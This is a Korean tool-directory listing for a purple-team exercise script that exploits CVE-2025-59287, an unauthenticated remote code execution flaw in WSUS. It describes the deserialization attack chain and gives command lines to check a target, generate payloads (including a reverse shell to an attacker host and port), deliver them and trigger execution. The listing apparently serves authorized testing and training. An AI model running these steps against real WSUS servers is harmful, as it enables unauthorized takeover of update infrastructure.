Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-59287-Exercise-Use — WSUS 데이터베이스에 악의적인 역직렬화 페이로드를 주입하여 WSUS에서 인증되지 않은 원격 코드 실행(RCE)을 가능하게 하는 CVE-2025-59287을 시연하는 퍼플 팀 훈련 스크립트입니다. | Kitploit
도구/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRed TeamingPayload DevelopmentLabs & Practice
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

WSUS 데이터베이스에 악의적인 역직렬화 페이로드를 주입하여 WSUS에서 인증되지 않은 원격 코드 실행(RCE)을 가능하게 하는 CVE-2025-59287을 시연하는 퍼플 팀 훈련 스크립트입니다.

저장소 보기
5개월 전아직 검토되지 않음

CVE-2025-59287 — WSUS 인증되지 않은 원격 코드 실행

CVE-2025-59287용 퍼플 팀 연습 스크립트로, Windows Server Update Services (WSUS)의 인증되지 않은 원격 코드 실행 취약점입니다.

승인된 용도로만 사용하십시오. 통제된 연습 환경에서 귀하가 소유하거나 명시적인 서면 허가를 받은 시스템에 대해서만 사용하십시오.

작동 방식

이 취약점은 익명으로 접근 가능한 WSUS SOAP 엔드포인트를 악용하여 악성 역직렬화 페이로드를 WSUS 데이터베이스에 주입합니다. 페이로드는 WSUS 관리 콘솔이 열리거나 동기화가 트리거될 때 실행됩니다.

  1. WSUS 인증 서비스는 익명 클라이언트에게 유효한 토큰을 발급합니다
  2. 클라이언트 웹 서비스를 통해 토큰을 보고 세션 쿠키로 교환합니다
  3. 보고 서비스를 통해 악성 직렬화 객체가 WSUS 데이터베이스에 주입됩니다
  4. WSUS 콘솔이 로드되거나 동기화 이벤트가 발생할 때 페이로드가 실행됩니다

요구 사항

  • PowerShell 5.1+가 설치된 Windows 공격 박스
  • 포트 8530의 WSUS에 네트워크 접근
  • ysoserial\Release\ 폴더에 ysoserial.net 배치 (설정 참조)

리포지토리 구조

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # 대상이 취약한지 확인
├── 2-generate.ps1    # 직렬화된 페이로드 블롭 생성
├── 3-deliver.ps1     # WSUS 서버에 페이로드 전달
├── 4-verify.ps1      # 실행 확인 및 정리
├── ysoserial/        # ysoserial.net 릴리즈를 여기에 배치하십시오 (커밋되지 않음)
│   └── Release/
│       └── ysoserial.exe
└── README.md

설정

리포지토리를 클론하거나 다운로드하십시오. 경로가 ysoserial\Release\ysoserial.exe와 일치하도록 ysoserial.net을 추가하십시오.

ysoserial.net 다운로드: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 기본적으로 Windows Defender가 트리거됩니다.

사용법

모든 스크립트를 리포지토리 루트에서 실행하십시오.

1 — 확인

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — 생성

파일 드롭 (리스너 불필요, 먼저 권장):

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

리버스 셸:

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — 전달

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — 트리거

WSUS 서버에서 시작 > Windows Server Update Services를 통해 관리 콘솔을 열거나 PowerShell을 통해 동기화를 트리거하십시오:

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — 확인 및 정리

실행 확인:

root@kitploit:~
.\4-verify.ps1

모든 아티팩트 확인 및 정리:

root@kitploit:~
.\4-verify.ps1 -Cleanup

공격 박스에서 관리 공유를 통해:

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

정리 후 WSUS 콘솔의 Computers에서 연습 컴퓨터를 제거하십시오.

탐지 기회

참고 자료

  • CVE-2025-59287 — 원본 연구: hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
도구 다운로드